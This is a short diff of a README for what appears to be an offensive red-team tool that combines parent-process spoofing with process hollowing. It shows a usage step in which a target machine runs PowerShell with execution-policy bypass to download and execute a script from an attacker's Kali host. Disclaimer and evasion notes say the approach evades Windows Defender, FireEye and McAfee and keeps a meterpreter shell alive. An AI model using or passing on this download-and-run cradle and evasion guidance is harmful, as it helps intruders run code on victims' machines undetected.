bowtiejicode/Reflective-PPIDxProcHollow/README.md

 4. On your target machine `powershell -ep Bypass -c IEX(New-Object System.Net.WebClient).DownloadString('http://KALI_IP:8088/PPIDxProcHollow_v1.1.ps1')`

 ## Disclaimer
-The usage section might make it seem like a 'fileless' approach but it does write temporarly artifacts to disk.
+The usage section might make it seem like a 'fileless' approach but it **does write temporarly artifacts to disk**.
 I know disk is lava🔥 but writing it this way seems to evade Window Defender/FireEye/McAfee😨

 ## Evading Windows Defender
 - The v1.0 script creates an alert on Windows Defender upon launching cmd.exe from meterpreter shell.
 However, your meterpreter shell will still be **kept alive** despite the alert.